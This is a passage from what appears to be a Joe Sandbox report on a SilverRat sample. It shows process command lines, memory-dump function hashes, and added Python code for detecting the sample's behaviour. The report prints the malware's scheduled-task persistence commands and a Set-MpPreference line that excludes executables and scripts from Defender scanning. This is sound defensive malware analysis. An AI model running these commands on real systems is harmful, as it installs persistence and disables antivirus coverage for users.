                                                    • Rule: JoeSecurity_SilverRat, Description: Yara detected SilverRat, Source: C:\Users\user\java\$77java.exe, Author: Joe Security
                                                    Antivirus matches:
                                                    • Detection: 100%, Avira
                                                    • Detection: 100%, Joe Sandbox ML
                                                    • Detection: 66%, ReversingLabs
                                                    Reputation:low
                                                    Has exited:false

                                                    Target ID:14
                                                    Start time:16:53:10
                                                    Start date:09/11/2024
                                                    Path:C:\Windows\System32\schtasks.exe
                                                    Wow64 process (32bit):false
                                                    Commandline:"schtasks.exe" /query /TN $77java.exe
                                                    Imagebase:0x7ff6609c0000
                                                    File size:235'008 bytes
                                                    MD5 hash:76CD6626DD8834BD4A42E6A565104DC2
                                                    Has elevated privileges:true
                                                    Has administrator privileges:true
                                                    Programmed in:C, C++ or other language
                                                    Reputation:high
                                                    Has exited:true

                                                    Target ID:15
                                                    Start time:16:53:10
                                                    Start date:09/11/2024
                                                    Path:C:\Windows\System32\conhost.exe
                                                    Wow64 process (32bit):false
                                                    Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                    Imagebase:0x7ff66e660000
                                                    File size:862'208 bytes
                                                    MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                    Has elevated privileges:true
                                                    Has administrator privileges:true
                                                    Programmed in:C, C++ or other language
                                                    Reputation:high
                                                    Has exited:true

                                                    Target ID:16
                                                    Start time:16:53:10
                                                    Start date:09/11/2024
                                                    Path:C:\Windows\System32\schtasks.exe
                                                    Wow64 process (32bit):false
                                                    Commandline:"schtasks.exe" /Create /SC ONCE /TN "$77java.exe" /TR "C:\Users\user\java\$77java.exe \"\$77java.exe\" /AsAdmin" /ST 00:01 /IT /F /RL HIGHEST
                                                    Imagebase:0x7ff6609c0000
                                                    File size:235'008 bytes
                                                    MD5 hash:76CD6626DD8834BD4A42E6A565104DC2
                                                    Has elevated privileges:true
                                                    Has administrator privileges:true
                                                    Programmed in:C, C++ or other language
                                                    Reputation:high
                                                    Has exited:true

                                                    Target ID:17
                                                    Start time:16:53:10
                                                    Start date:09/11/2024
                                                    Path:C:\Windows\System32\conhost.exe
                                                    Wow64 process (32bit):false
                                                    Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                    Imagebase:0x7ff66e660000
                                                    File size:862'208 bytes
                                                    MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                    Has elevated privileges:true
                                                    Has administrator privileges:true
                                                    Programmed in:C, C++ or other language
                                                    Has exited:true

                                                    Target ID:18
                                                    Start time:16:53:10
                                                    Start date:09/11/2024
                                                    Path:C:\Windows\System32\schtasks.exe
                                                    Wow64 process (32bit):false
                                                    Commandline:"schtasks.exe" /query /TN $77java.exe
                                                    Imagebase:0x7ff6609c0000
                                                    File size:235'008 bytes
                                                    MD5 hash:76CD6626DD8834BD4A42E6A565104DC2
                                                    Has elevated privileges:true
                                                    Has administrator privileges:true
                                                    Programmed in:C, C++ or other language
                                                    Has exited:true

                                                    Target ID:19
                                                    Start time:16:53:10
                                                    Start date:09/11/2024
                                                    Path:C:\Windows\System32\conhost.exe
                                                    Wow64 process (32bit):false
                                                    Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                    Imagebase:0x7ff66e660000
                                                    File size:862'208 bytes
                                                    MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                    Has elevated privileges:true
                                                    Has administrator privileges:true
                                                    Programmed in:C, C++ or other language
                                                    Has exited:true

                                                    Target ID:20
                                                    Start time:16:53:10
                                                    Start date:09/11/2024
                                                    Path:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                    Wow64 process (32bit):false
                                                    Commandline:"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Set-MpPreference -ExclusionExtension exe,bat,dll,ps1;exit
                                                    Imagebase:0x7ff6e3d50000
                                                    File size:452'608 bytes
                                                    MD5 hash:04029E121A0CFA5991749937DD22A1D9
                                                    Has elevated privileges:true
                                                    Has administrator privileges:true
                                                    Programmed in:C, C++ or other language
                                                    Has exited:true

                                                    Target ID:21
                                                    Start time:16:53:10
                                                    Start date:09/11/2024
                                                    Path:C:\Windows\System32\conhost.exe
                                                    Wow64 process (32bit):false
                                                    Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                    Imagebase:0x7ff66e660000
                                                    File size:862'208 bytes
                                                    MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                    Has elevated privileges:true
                                                    Has administrator privileges:true
                                                    Programmed in:C, C++ or other language
                                                    Has exited:true

                                                    Target ID:22
                                                    Start time:16:53:11
                                                    Start date:09/11/2024
                                                    Path:C:\Windows\System32\schtasks.exe
                                                    Wow64 process (32bit):false
                                                    Commandline:"C:\Windows\System32\schtasks.exe" /create /sc daily /tn "java_Task-DAILY-21PM" /TR "%MyFile%" /ST 21:00
                                                    Imagebase:0x7ff6609c0000
                                                    File size:235'008 bytes
                                                    MD5 hash:76CD6626DD8834BD4A42E6A565104DC2
                                                    Has elevated privileges:true
                                                    Has administrator privileges:true
                                                    Programmed in:C, C++ or other language
                                                    Has exited:true

                                                    Target ID:23
                                                    Start time:16:53:11
                                                    Start date:09/11/2024
                                                    Path:C:\Windows\System32\conhost.exe
                                                    Wow64 process (32bit):false
                                                    Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                    Imagebase:0x7ff66e660000
                                                    File size:862'208 bytes
                                                    MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                    Has elevated privileges:true
                                                    Has administrator privileges:true
                                                    Programmed in:C, C++ or other language
                                                    Has exited:true

                                                    Target ID:24
                                                    Start time:16:53:11
                                                    Start date:09/11/2024
                                                    Path:C:\Users\user\java\$77java.exe
                                                    Wow64 process (32bit):false
                                                    Commandline:C:\Users\user\java\$77java.exe "\$77java.exe" /AsAdmin
                                                    Imagebase:0x210000
                                                    File size:46'592 bytes
                                                    MD5 hash:537B270C2278044E4C3958530F745ECE
                                                    Has elevated privileges:true
                                                    Has administrator privileges:true
                                                    Programmed in:C, C++ or other language
                                                    Has exited:true

                                                    Target ID:25
                                                    Start time:16:53:13
                                                    Start date:09/11/2024
                                                    Path:C:\Windows\System32\wbem\WmiPrvSE.exe
                                                    Wow64 process (32bit):false
                                                    Commandline:C:\Windows\system32\wbem\wmiprvse.exe -secured -Embedding
                                                    Imagebase:0x7ff717f30000
                                                    File size:496'640 bytes
                                                    MD5 hash:60FF40CFD7FB8FE41EE4FE9AE5FE1C51
                                                    Has elevated privileges:true
                                                    Has administrator privileges:false
                                                    Programmed in:C, C++ or other language
                                                    Has exited:true
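The command lines in the Target entries above are the ones a detection engineer would write rules against: a ONCE task created with /RL HIGHEST whose name and action carry the "$77" prefix (the hide-marker convention of the open-source r77 rootkit; that attribution is this note's, not the report's), a query for that task, a Set-MpPreference call that excludes exe/bat/dll/ps1 from Defender scanning, a DAILY task whose action is the literal string %MyFile%, and the dropped $77java.exe launched from the user profile. The block below is an added example, not Joe Sandbox or SilverRat code: it evaluates those checks in Python over the report's own five command lines plus three constructed records (two benign negatives and one base64-encoded variant of the exclusion cmdlet, the form the signature "Powershell Base64 Encoded MpPreference Cmdlet" refers to, which the report's plain-text line is not). The record labels and tag names are the example's own.

```python
"""Flag the persistence / defense-evasion command lines from the process tree above.

Added example, not Joe Sandbox or SilverRat code. Four checks, evaluated the way a
SIEM rule runs over Sysmon Event ID 1 / Security 4688 command lines:
  * a file or task name carrying the "$77" hide-prefix (r77 rootkit convention)
  * an image launched from under the user profile
  * schtasks /create with /RL HIGHEST, an action under the user profile, or an
    action that is still an unexpanded %VAR% placeholder
  * Set-/Add-MpPreference adding a Defender exclusion, also when hidden behind
    -EncodedCommand (UTF-16LE base64), which the report's own line is not
"""
import base64
import re
from dataclasses import dataclass


@dataclass(frozen=True)
class ProcEvent:
    label: str    # short name assigned here, not a report field
    image: str
    cmdline: str


R77_MARK = re.compile(r"""(?:^|[\\\s"'])\$77[\w.]+""")
USER_PROFILE = re.compile(r"^(?:[a-z]:\\users\\|%(?:appdata|localappdata|temp|userprofile)%)", re.I)
SCHTASKS_TR = re.compile(r'/tr\s+(?:"((?:[^"\\]|\\.)*)"|(\S+))', re.I)   # /TR "quoted" or bare
RL_HIGHEST = re.compile(r"/rl\s+highest", re.I)
ENV_PLACEHOLDER = re.compile(r"%[^%\s]+%")
MP_EXCLUSION = re.compile(
    r"\b(?:Set|Add)-MpPreference\b.*?-Exclusion(?:Path|Extension|Process|IpAddress)\b", re.I | re.S)
ENCODED_ARG = re.compile(r"-(?:e|ec|enc|encodedcommand)\s+([A-Za-z0-9+/=]+)", re.I)


def expand_encoded(cmdline: str) -> str:
    """Append the decoded -EncodedCommand payload, if one is present and valid."""
    m = ENCODED_ARG.search(cmdline)
    if not m:
        return cmdline
    try:
        decoded = base64.b64decode(m.group(1), validate=True).decode("utf-16-le")
    except (ValueError, UnicodeDecodeError):
        return cmdline
    return f"{cmdline} [decoded: {decoded}]"


def analyze(ev: ProcEvent) -> list[str]:
    """Return the technique tags that fire for one process-creation record."""
    tags = []
    image_name = ev.image.rsplit("\\", 1)[-1].lower()
    cmd = expand_encoded(ev.cmdline)
    if R77_MARK.search(ev.image) or R77_MARK.search(cmd):
        tags.append("r77_hide_prefix")
    if USER_PROFILE.match(ev.image):
        tags.append("image_under_user_profile")
    if image_name == "schtasks.exe" and "/create" in cmd.lower():
        if RL_HIGHEST.search(cmd):
            tags.append("schtasks_create_highest")
        m = SCHTASKS_TR.search(cmd)
        action = (m.group(1) or m.group(2) or "").strip() if m else ""
        if USER_PROFILE.match(action):
            tags.append("schtasks_action_under_user_profile")
        if ENV_PLACEHOLDER.fullmatch(action):
            tags.append("schtasks_action_unexpanded_env_var")
    if image_name in ("powershell.exe", "pwsh.exe") and MP_EXCLUSION.search(cmd):
        tags.append("defender_exclusion_added")
    return tags


def scan(events) -> dict[str, list[str]]:
    return {ev.label: analyze(ev) for ev in events}


PS = r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"
TASK = r"C:\Windows\System32\schtasks.exe"
# Constructed: the exclusion cmdlet as it would look behind -EncodedCommand.
ENCODED = base64.b64encode("Add-MpPreference -ExclusionPath C:\\Users\\Public".encode("utf-16-le")).decode()

# The first five records are the command lines of the Target entries above; the
# last three are constructed (two benign negatives, one encoded positive).
EVENTS = [
    ProcEvent("schtasks_create_once", TASK,
              r'"schtasks.exe" /Create /SC ONCE /TN "$77java.exe" /TR "C:\Users\user\java\$77java.exe \"\$77java.exe\" /AsAdmin" /ST 00:01 /IT /F /RL HIGHEST'),
    ProcEvent("schtasks_query", TASK, r'"schtasks.exe" /query /TN $77java.exe'),
    ProcEvent("powershell_set_mppreference", PS,
              rf'"{PS}" Set-MpPreference -ExclusionExtension exe,bat,dll,ps1;exit'),
    ProcEvent("schtasks_create_daily", TASK,
              rf'"{TASK}" /create /sc daily /tn "java_Task-DAILY-21PM" /TR "%MyFile%" /ST 21:00'),
    ProcEvent("dropped_$77java", r"C:\Users\user\java\$77java.exe",
              r'C:\Users\user\java\$77java.exe "\$77java.exe" /AsAdmin'),
    ProcEvent("benign_schtasks", TASK,
              r'schtasks.exe /Create /SC DAILY /TN "Backup" /TR "C:\Program Files\Backup\run.exe" /ST 02:00'),
    ProcEvent("benign_powershell", PS, rf'"{PS}" Get-MpPreference'),
    ProcEvent("encoded_add_mppreference", PS, rf'"{PS}" -NoProfile -enc {ENCODED}'),
]

if __name__ == "__main__":
    for label, tags in scan(EVENTS).items():
        print(f"{label:30s} {', '.join(tags) or '-'}")
```

The /TR value of the DAILY task is flagged on its own rule because the action is the literal text %MyFile% rather than a path; a task action that is still an unexpanded variable is worth a look regardless of which variable it names. The schtasks /query line fires only on the $77 prefix, which is the intended behaviour: the query itself is benign, the name is not.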


                                                      Execution Graph

                                                      Execution Coverage:18.9%
                                                      Dynamic/Decrypted Code Coverage:100%
                                                      Signature Coverage:53.8%
                                                      Total number of Nodes:13
                                                      Total number of Limit Nodes:0
                                                      Executed paths (graph image not captured):
                                                      • 7ffd34697c15 → 7ffd34697c1f → 7ffd34697ce6 NtSetValueKey → 7ffd34697d3f
                                                      • 7ffd34697a99 → 7ffd34697aa7 RegOpenKeyExW → 7ffd34697b8a
                                                      • 7ffd34697c79 → 7ffd34697c83 NtSetValueKey → 7ffd34697d3f
                                                      • 7ffd34696820 → 7ffd34696829 InternetGetConnectedState → 7ffd346968d3

                                                      Control-flow Graph
                                                      • Function at 7ffd34697c15 (graph image not captured): calls the subroutine at 7ffd34696c10 from block 7ffd34697c2c and NtSetValueKey from block 7ffd34697ce6.
                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.2161436496.00007FFD34690000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD34690000, based on PE: false
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_0_2_7ffd34690000_RLesaPFXew.jbxd
                                                      Similarity
                                                      • API ID:
                                                      • String ID:
                                                      • API String ID:
                                                      • Opcode ID: 9fd8a9efe59ad994e993c81cbd99fe250a68d682a826e06e9fc91e899a4dc8af
                                                      • Instruction ID: d77582696c1b9a1021cf10b7990099c4193c2f8eea8dc048b4ddda62d3e13821
                                                      • Opcode Fuzzy Hash: 9fd8a9efe59ad994e993c81cbd99fe250a68d682a826e06e9fc91e899a4dc8af
                                                      • Instruction Fuzzy Hash: C3511771A0CB9C8FD718DF28D8956F5BBF0EF9A311F14426FD08DD3262C664A8468791

                                                      Control-flow Graph
                                                      • Function at 7ffd34697c79 (graph image not captured): calls NtSetValueKey from block 7ffd34697ce6; its blocks overlap the tail of the function at 7ffd34697c15.
                                                      APIs
                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.2161436496.00007FFD34690000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD34690000, based on PE: false
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_0_2_7ffd34690000_RLesaPFXew.jbxd
                                                      Similarity
                                                      • API ID: Value
                                                      • String ID:
                                                      • API String ID: 3702945584-0
                                                      • Opcode ID: c2b522cf19dec30e0cc577e3a41ad1977b8529c5f5dd2be870cd4377ee3298ec
                                                      • Instruction ID: 8353e3d8f5ab89e94d8171ecf796616611c6826855f71e2c54300940140a62d2
                                                      • Opcode Fuzzy Hash: c2b522cf19dec30e0cc577e3a41ad1977b8529c5f5dd2be870cd4377ee3298ec
                                                      • Instruction Fuzzy Hash: 5D31E431A0CA4C8FDB58DF58D8466F97BE0FBA9321F10412FD049D3252D674A8468B81

                                                      Control-flow Graph
                                                      • Function at 7ffd346960c2 (graph image not captured): no API calls; calls the subroutine at 7ffd34696550 from block 7ffd346964d2.
                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.2161436496.00007FFD34690000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD34690000, based on PE: false
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_0_2_7ffd34690000_RLesaPFXew.jbxd
                                                      Similarity
                                                      • API ID:
                                                      • String ID:
                                                      • API String ID:
                                                      • Opcode ID: 5c2689518fc686edf0bd69d9cb585db26ad17e6eaf5e7bb543d96e494da31652
                                                      • Instruction ID: 0415d64036107b1ba76ffbb53ceb7c498e3209f25adf7578b4f02b1b0775d1ad
                                                      • Opcode Fuzzy Hash: 5c2689518fc686edf0bd69d9cb585db26ad17e6eaf5e7bb543d96e494da31652
                                                      • Instruction Fuzzy Hash: BFE19430A0CA8E8FEBA8DF28C8657E977D1FF55310F14426ED84DC72A1DB78A9458781

                                                      Control-flow Graph
                                                      • Function at 7ffd34697a99 (graph image not captured): calls RegOpenKeyExW from block 7ffd34697b40.
                                                      APIs
                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.2161436496.00007FFD34690000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD34690000, based on PE: false
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_0_2_7ffd34690000_RLesaPFXew.jbxd
                                                      Similarity
                                                      • API ID: Open
                                                      • String ID:
                                                      • API String ID: 71445658-0
                                                      • Opcode ID: e2a714aaa8e4fee38200da61c8f7037c1336e9e92db5a0ecd16fbc2875187eec
                                                      • Instruction ID: ea47fb810b42c4dbaa4aafc3d603e7308ea1efe941ab28e980451e5f5b436b34
                                                      • Opcode Fuzzy Hash: e2a714aaa8e4fee38200da61c8f7037c1336e9e92db5a0ecd16fbc2875187eec
                                                      • Instruction Fuzzy Hash: 3541B37190CB588FDB18DF9898956F97BF0FBA9311F04426FD08DD3252CAB4A805CB92

                                                      Control-flow Graph
                                                      • Function at 7ffd34696820 (graph image not captured): calls InternetGetConnectedState from block 7ffd34696870.
                                                      APIs
                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.2161436496.00007FFD34690000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD34690000, based on PE: false
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_0_2_7ffd34690000_RLesaPFXew.jbxd
                                                      Similarity
                                                      • API ID: ConnectedInternetState
                                                      • String ID:
                                                      • API String ID: 97057780-0
                                                      • Opcode ID: 1a867958a92c657e9657850eeeeff7c9e9451ba105f24d2998d1d19072f75b73
                                                      • Instruction ID: 9ade69bf2a0fcc23b643886eade9cbb411fb0ab9a0ae0f8750b0171dd0400523
                                                      • Opcode Fuzzy Hash: 1a867958a92c657e9657850eeeeff7c9e9451ba105f24d2998d1d19072f75b73
                                                      • Instruction Fuzzy Hash: 49310131A0C61C8FEB58DF98D8957E97BE1EB66320F04016FD049D3192DB74A846CBA1
                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.2161436496.00007FFD34690000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD34690000, based on PE: false
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_0_2_7ffd34690000_RLesaPFXew.jbxd
                                                      Similarity
                                                      • API ID:
                                                      • String ID:
                                                      • API String ID:
                                                      • Opcode ID: ab71d4494af701d5547f1aa7d8d38c2a44d02fe3945942b00580e752095c9a8c
                                                      • Instruction ID: bce6672a1183edc75397dcdddfce1f419712f4a7074743915f5187477688b624
                                                      • Opcode Fuzzy Hash: ab71d4494af701d5547f1aa7d8d38c2a44d02fe3945942b00580e752095c9a8c
                                                      • Instruction Fuzzy Hash: 00F18531A0CA8D8FEBA8DF28C8657E937E1FF55311F04426EE84DC7291DB7899458B81
                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.2161436496.00007FFD34690000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD34690000, based on PE: false
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_0_2_7ffd34690000_RLesaPFXew.jbxd
                                                      Similarity
                                                      • API ID:
                                                      • String ID:
                                                      • API String ID:
                                                      • Opcode ID: 62b1d1dbc277cdc128df9012821dae6e268e64d068c784659a2dd02360647477
                                                      • Instruction ID: d86361d57b1d83938256a0efcaa0a2adcc45dc89aa3e38642bb1e24dbd4f0b6f
                                                      • Opcode Fuzzy Hash: 62b1d1dbc277cdc128df9012821dae6e268e64d068c784659a2dd02360647477
                                                      • Instruction Fuzzy Hash: 5C916257A0E7D21EE7536A7868F50E63F60DF5326971D01E7C2C4CB0A3ED0C284A9262

                                                      Execution Graph

                                                      Execution Coverage:19.5%
                                                      Dynamic/Decrypted Code Coverage:100%
                                                      Signature Coverage:0%
                                                      Total number of Nodes:6
                                                      Total number of Limit Nodes:0

                                                      Control-flow Graph
                                                      • Function at 7ffd3468a188 (graph image not captured): calls SetWindowsHookExW from block 7ffd3468a222.
                                                      APIs
                                                      Memory Dump Source
                                                      • Source File: 0000000D.00000002.3393134615.00007FFD34680000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD34680000, based on PE: false
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_13_2_7ffd34680000_$77java.jbxd
                                                      Similarity
                                                      • API ID: HookWindows
                                                      • String ID:
                                                      • API String ID: 2559412058-0
                                                      • Opcode ID: a6cf6c5c2147822b9a3168ba1f00461b980a61aec87b1dc5d1000ca82bd03ab0
                                                      • Instruction ID: fe8075502e9302ba6a945a2f07b859f36d6b5cbb49b751855b482d27df5abadb
                                                      • Opcode Fuzzy Hash: a6cf6c5c2147822b9a3168ba1f00461b980a61aec87b1dc5d1000ca82bd03ab0
                                                      • Instruction Fuzzy Hash: B3412A30A1CA5C4FEB59DFAC98566F9BBE1EB59321F04027ED049D3192CE756812C7C1

                                                      Control-flow Graph
                                                      • Function at 7ffd34686820 (graph image not captured): calls InternetGetConnectedState from block 7ffd34686870.
                                                      APIs
                                                      Memory Dump Source
                                                      • Source File: 0000000D.00000002.3393134615.00007FFD34680000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD34680000, based on PE: false
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_13_2_7ffd34680000_$77java.jbxd
                                                      Similarity
                                                      • API ID: ConnectedInternetState
                                                      • String ID:
                                                      • API String ID: 97057780-0
                                                      • Opcode ID: 3bbe94008a5b85540e7eb1d77355db0ed0d3b7d880b36fd536d450861e83d5c8
                                                      • Instruction ID: 78f0789aa267eb67ca6d487e5b8ba3849f77449740d9a317bcda448b9045f142
                                                      • Opcode Fuzzy Hash: 3bbe94008a5b85540e7eb1d77355db0ed0d3b7d880b36fd536d450861e83d5c8
                                                      • Instruction Fuzzy Hash: 80310171A0C61C8FEB58DFA8D8857E97BE0EB56320F04416FD04DD3192CB24A856CB91
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000018.00000002.2210318370.00007FFD34690000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD34690000, based on PE: false
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_24_2_7ffd34690000_$77java.jbxd
                                                      Similarity
                                                      • API ID:
                                                      • String ID: cBL_^
                                                      • API String ID: 0-1749287841
                                                      • Opcode ID: f253a7a5156928a065ca57cb357efd836d8aa0dbf15103bd97878480c2936a8a
                                                      • Instruction ID: dea64b46c7ef5dbc0657999082ba9fe03e4217e00c4b7a93bd232fa1eae9b754
                                                      • Opcode Fuzzy Hash: f253a7a5156928a065ca57cb357efd836d8aa0dbf15103bd97878480c2936a8a
                                                      • Instruction Fuzzy Hash: 7151A121F1DE664AFBA5BB6880B63F932D0EF56305F4000BAE14ED31D7CEAD68419391
                                                      Memory Dump Source
                                                      • Source File: 00000018.00000002.2210318370.00007FFD34690000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD34690000, based on PE: false
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_24_2_7ffd34690000_$77java.jbxd
                                                      Similarity
                                                      • API ID:
                                                      • String ID:
                                                      • API String ID:
• Opcode ID: 8db4c7a9b856ed0b4df014ec97e757e5ed85d934ca872bf0ce714f27a8f42e5c
• Instruction ID: 52d831df9b15a2d584b2abc8e2fc0c55b9f4a25a950f6bc5d67f83e00a7be933
• Opcode Fuzzy Hash: 8db4c7a9b856ed0b4df014ec97e757e5ed85d934ca872bf0ce714f27a8f42e5c
• Instruction Fuzzy Hash: 5391E521B1DA994FE7A2F7B884796A53BE1EF4A21174500FAE44DCB2A3DD6C9C02C741

Memory Dump Source
• Source File: 00000018.00000002.2210318370.00007FFD34690000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD34690000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_24_2_7ffd34690000_$77java.jbxd
Similarity
• API ID:
• String ID:
• API String ID:
• Opcode ID: 681a9b6847563dc31186a5aed63fd2a7099069799648a626b09540dbc14a7f2b
• Instruction ID: 538304940589e1a1bf5bd996418bad740dbdcb21d90f2080f4571a1c4ae500ef
• Opcode Fuzzy Hash: 681a9b6847563dc31186a5aed63fd2a7099069799648a626b09540dbc14a7f2b
• Instruction Fuzzy Hash: 6B71A631B0C9995FEB85EB6CD4A57E87BE1EF9A310F1401BAD04DC3293CD69A8428751

Memory Dump Source
• Source File: 00000018.00000002.2210318370.00007FFD34690000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD34690000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_24_2_7ffd34690000_$77java.jbxd
Similarity
• API ID:
• String ID:
• API String ID:
• Opcode ID: e91e492bdb7b49166a4b353b02ef3514d06fb0ea001a5e631c2ce11a68068606
• Instruction ID: 764846954449d9d711013d2b660c5836c0b97937a439459b60b3ac3c9b4d69f8
• Opcode Fuzzy Hash: e91e492bdb7b49166a4b353b02ef3514d06fb0ea001a5e631c2ce11a68068606
• Instruction Fuzzy Hash: 01618031B189599FEB98EB5CD4A5BED7BE1FF99310F140179E04EC3292CE68AC428741

Memory Dump Source
• Source File: 00000018.00000002.2210318370.00007FFD34690000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD34690000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_24_2_7ffd34690000_$77java.jbxd
Similarity
• API ID:
• String ID:
• API String ID:
• Opcode ID: 617b0430ffe846bbf321bce5ab210977cfab8fdf57bd874aca5c661f749aabd2
• Instruction ID: c11ae67d78542458d0e6327c14c788806e3342632629709ca14d3876ba9099e7
• Opcode Fuzzy Hash: 617b0430ffe846bbf321bce5ab210977cfab8fdf57bd874aca5c661f749aabd2
• Instruction Fuzzy Hash: BB41B120B08B9E8FDB95FB98C4A12E97BF1FF99304B9080B5D44DD3787DA286901C791

Memory Dump Source
• Source File: 00000018.00000002.2210318370.00007FFD34690000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD34690000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_24_2_7ffd34690000_$77java.jbxd
Similarity
• API ID:
• String ID:
• API String ID:
• Opcode ID: 094824dd767b58c528b2d22bc0a15eaf04193a729eaa6306c261bc3ed4e51c36
• Instruction ID: d5608b03c798a9784fc5cdd2ae151ab181398f13322cbd1a5d0e3a543fb5ee3b
• Opcode Fuzzy Hash: 094824dd767b58c528b2d22bc0a15eaf04193a729eaa6306c261bc3ed4e51c36
• Instruction Fuzzy Hash: C5012D21A0C7A51FF345AF2458B64F13FD4DB96764B1845BBE48CC71E3D84D55838392

Memory Dump Source
• Source File: 00000018.00000002.2210318370.00007FFD34690000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD34690000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_24_2_7ffd34690000_$77java.jbxd
Similarity
• API ID:
• String ID:
• API String ID:
• Opcode ID: 7798ef91e82d4fc2d5865734bb00287c98945f5eed30a7ef752e22f3c900ff49
• Instruction ID: 23a45fb703a77e3e5545c8c584db24e349c9945fea03258e85b4e51c6426199b
• Opcode Fuzzy Hash: 7798ef91e82d4fc2d5865734bb00287c98945f5eed30a7ef752e22f3c900ff49
• Instruction Fuzzy Hash: ECE0687390DA0C1EEA18E91DAC06DE63FD8EBC7238F00005FE48DC2052E0527563C351
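The function records above are plain text, and the values worth pivoting on (the Instruction Fuzzy Hash, the Opcode ID, the memory dump and base address a function was lifted from) are buried in repeated boilerplate. The parser below is an added example, not part of Joe Sandbox or of this report; it infers the record layout from the lines on this page (a record starts at "Memory Dump Source" and consists of "• key: value" bullets) and is fed a constructed sample made of two records copied from this section. The meaning of the dotted fields inside the .sdmp file name is not decoded, since the report does not document it; only the "Offset" and "based on PE" parts, which are self-describing, are interpreted.

```python
"""Parse Joe Sandbox 'Memory Dump Source' function records into structured data.

Added example (not Joe Sandbox code): extracts per-function identifiers and the
dump they came from so they can be compared across samples. The record layout
is inferred from the report text; the sample below is constructed from two of
the records on this page.
"""
import re
from collections import defaultdict

# Constructed sample: two consecutive records copied from this report section.
SAMPLE = """\
Memory Dump Source
• Source File: 00000018.00000002.2210318370.00007FFD34690000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD34690000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_24_2_7ffd34690000_$77java.jbxd
Similarity
• API ID:
• String ID:
• API String ID:
• Opcode ID: 681a9b6847563dc31186a5aed63fd2a7099069799648a626b09540dbc14a7f2b
• Instruction ID: 538304940589e1a1bf5bd996418bad740dbdcb21d90f2080f4571a1c4ae500ef
• Opcode Fuzzy Hash: 681a9b6847563dc31186a5aed63fd2a7099069799648a626b09540dbc14a7f2b
• Instruction Fuzzy Hash: 6B71A631B0C9995FEB85EB6CD4A57E87BE1EF9A310F1401BAD04DC3293CD69A8428751
Memory Dump Source
• Source File: 00000018.00000002.2210318370.00007FFD34690000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD34690000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_24_2_7ffd34690000_$77java.jbxd
Similarity
• API ID:
• String ID:
• API String ID:
• Opcode ID: e91e492bdb7b49166a4b353b02ef3514d06fb0ea001a5e631c2ce11a68068606
• Instruction ID: 764846954449d9d711013d2b660c5836c0b97937a439459b60b3ac3c9b4d69f8
• Opcode Fuzzy Hash: e91e492bdb7b49166a4b353b02ef3514d06fb0ea001a5e631c2ce11a68068606
• Instruction Fuzzy Hash: 01618031B189599FEB98EB5CD4A5BED7BE1FF99310F140179E04EC3292CE68AC428741
"""

RECORD_START = "Memory Dump Source"
# "<dump file>, Offset: <hex>, based on PE: true|false" as it appears in the report.
SOURCE_RE = re.compile(
    r"^(?P<file>\S+), Offset: (?P<offset>[0-9A-Fa-f]+), based on PE: (?P<pe>true|false)$"
)


def parse_records(text):
    """Return one dict per function record.

    A record begins at a 'Memory Dump Source' line; every '• key: value' bullet
    up to the next start line belongs to it. Section labels without a bullet
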